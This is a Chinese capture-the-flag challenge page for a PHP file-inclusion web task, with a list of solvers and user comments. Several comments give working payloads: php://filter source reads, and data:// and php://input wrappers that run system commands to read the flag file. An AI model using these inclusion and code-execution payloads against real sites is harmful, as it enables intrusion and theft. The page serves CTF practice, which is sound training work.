简单的IncludeWEB 未解决
分数:
15
金币:
2
题目作者:
hanzkj
一 血:
flagOrz
一血奖励:
2金币
解 决:
320
提 示:
描 述:
听说你很会读文件?我把门(目录遍历)焊死了,窗户(关键词过滤)也封了。笔给你,你来写(payload)。
评分(0)
暂无评分
解题动态
dwx386572657 攻破了该题 3天前
星落. 攻破了该题 4天前
zxx256xxz 攻破了该题 6天前
传说中的小菜鸟 攻破了该题 11天前
bctivy99 攻破了该题 12天前
255a 攻破了该题 12天前
13830759935 攻破了该题 15天前
shuangyqqh 攻破了该题 20天前
wuyong5025 攻破了该题 21天前
fenglian88 攻破了该题 22天前
cacssac 攻破了该题 22天前
JINY123 攻破了该题 22天前
simho-agent 攻破了该题 23天前
dacming9527 攻破了该题 23天前
刚哥glory 攻破了该题 24天前
docker_01 攻破了该题 26天前
Tgentimc 攻破了该题 26天前
ccttffwwyy 攻破了该题 26天前
x_xisr 攻破了该题 27天前
评论
kitniu 3月前
举报
1.IP/?page=php://filter/read=convert.base64-encode/resource=index.php 2.IP/?page=data://text/plain,%3C?php%20system(%27cat%20/fla?%27)?%3E
网恋秀牛子被录屏导致自卑 6月前
举报
/?page=data://text/plain,<?=exec("cat /fla?")?>
shrinp 6月前
举报
php://filter/convert.base64-encode/resource获取源码-》查看WAF细节-》使用data://text/plain, <?php 你需要的命令?>即可
yinghui130 7月前
举报
POST /?page=php://input HTTP/1.1 &lt;br&gt; Host: 171.80.2.169:15133 &lt;br&gt; &lt;br&gt; &lt;?php system('tac /flag ');?&gt;
网恋秀牛子被录屏导致自卑 6月前
举报
@111222 这不是实体编码,是bugku不让发尖括号之类的符号,自动把评论替换成实体编码了
111222 7月前
举报
谢谢你的思路,不过我用burp试了一下这里不用实体编码似乎也可以过
Jazz888 7月前
举报
flag{**********}
wywitkey 7月前
举报
解题思路是伪协议,先期php://filter/读源码,后期data://text/plain,读flag